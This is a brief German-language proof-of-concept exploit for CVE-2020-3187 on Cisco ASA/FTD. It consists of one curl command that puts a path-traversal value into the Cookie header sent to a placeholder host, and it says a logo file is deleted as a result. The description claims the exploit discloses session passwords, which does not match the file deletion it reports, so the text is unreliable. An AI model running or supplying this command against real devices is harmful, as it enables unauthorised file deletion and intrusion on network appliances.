
Proof-of-Concept-Exploit für CVE-2020-3187, der auf die Offenlegung von Sitzungskennwörtern bei Cisco ASA/FTD über einen manipulierten HTTP-Cookie-Header abzielt.
curl -H "Cookie: token=. ./+CSOU+/csco_logo.gif" https://target.com/+CSCOE+/session_password.html
(logo.gif wird gelöscht)